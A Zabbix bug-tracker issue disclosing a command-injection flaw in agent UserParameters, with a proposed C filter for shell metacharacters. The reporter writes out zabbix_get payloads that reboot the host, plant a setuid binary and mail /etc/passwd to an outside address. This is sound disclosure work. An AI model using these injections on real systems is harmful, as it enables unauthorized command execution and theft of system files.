ZBX-790

Userparameter parameters aren't sanitised, allowing arbitrary command execution from zabbix_get

    Details

    • Type: Incident report
    • Status: Closed
    • Priority: Blocker
    • Resolution: Fixed
    • Affects Version/s: 1.4.5, 1.6.7, 1.9.0 (alpha)
    • Fix Version/s: 1.9.0 (alpha)
    • Component/s: Agent (G)
    • Labels:
      None
    • Environment:
      Ubuntu 8.10

      Description

      If you create a UserParameter which takes variable parameters, then by running zabbix_get you can use it to execute arbitrary commands as user zabbix on a machine running zabbix_agent; I'm not sure what benefit there might be to running arbitrary commands as user zabbix, but it's a concern nonetheless.

      I'm running the 1.4.6 version of zabbix included with Ubuntu 8.10, so this might have been fixed since, but I downloaded the 1.6.2 source and I don't see any sign of the zabbix_agent code sanitising the parameters passed to a UserParameter command.

      For example, if I add a user parameter I found on a web site for disk monitoring:

      UserParameter=custom.vfs.dev.write[*],grep $1 /proc/diskstats | head -1 | awk '{print $$8}'

      That's innocuous by itself, but any user can run zabbix_get with command lines like these:

      zabbix_get -slocalhost "-kcustom.vfs.dev.write.ops[x|/sbin/reboot]"
      zabbix_get -slocalhost "-kcustom.vfs.dev.write.ops[x|cp /usr/bin/whoami /home/foo/tmp ; chmod a+xs /home/foo/tmp/whoami]"
      zabbix_get -slocalhost "-kcustom.vfs.dev.write.ops[x|mail foo@bar.com < /etc/passwd]"

      They can execute any program (reboot probably won't let zabbix run it, but some machines might), copy any arbitrary program and make it setuid zabbix, access any restricted file that zabbix might have access to, or mail themselves any file on that machine that zabbix can read.

      I'm not quite sure what the best solution to this would be, but at a minimum zabbix_agent should reject any key strings containing |, ;, >, <, ", $, &, \, spaces, or other special shell characters. Even putting " around the $1 in the UserParameter definition isn't a workaround, because you can pass " characters as part of the key in the zabbix_get call.
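As an added example of the check the reporter proposes (not Zabbix code): a C function that rejects any item-key parameter containing the listed shell metacharacters before the agent substitutes it into a UserParameter command. The function names, the extension of the character list with backtick, single quote, parentheses, newline and tab, and the legitimate sample key `[sda]` are assumptions.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Characters the report lists (| ; > < " $ & \ and space), extended with
 * backtick, single quote, parentheses, newline and tab as an assumed
 * reading of "other special shell characters". */
static const char UNSAFE_CHARS[] = "|;><\"$&\\ `'()\n\t";

/* Returns true when args (the text between a key's outer [ and ]) contains
 * none of the characters above. A comma-separated list such as "sda,1"
 * passes; "x|/sbin/reboot" does not. */
bool userparam_args_are_safe(const char *args)
{
    for (; *args != '\0'; args++) {
        if (strchr(UNSAFE_CHARS, *args) != NULL)
            return false;
    }
    return true;
}

/* Validates a whole item key of the form name or name[args]. A key without
 * brackets carries no parameters and is accepted; a key whose '[' has no
 * closing ']' at the end is rejected as malformed. */
bool key_is_safe(const char *key)
{
    const char *open = strchr(key, '[');
    if (open == NULL)
        return true;
    size_t len = strlen(key);
    if (key[len - 1] != ']')
        return false;
    char args[256];
    size_t n = (size_t)((key + len - 1) - (open + 1));
    if (n >= sizeof(args))
        return false;           /* oversized parameter list: reject */
    memcpy(args, open + 1, n);
    args[n] = '\0';
    return userparam_args_are_safe(args);
}

int main(void)
{
    const char *keys[] = { "custom.vfs.dev.write.ops[sda]",              /* constructed legitimate key */
                           "custom.vfs.dev.write.ops[x|/sbin/reboot]" }; /* key from the report */
    for (size_t i = 0; i < sizeof(keys) / sizeof(keys[0]); i++)
        printf("%-45s %s\n", keys[i], key_is_safe(keys[i]) ? "accepted" : "rejected");
    return 0;
}
```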


              People

              • Assignee: Alexander Vladishev (sasha)
              • Reporter: Mark Grant (movieman)
              • Votes: 3
              • Watchers: 3
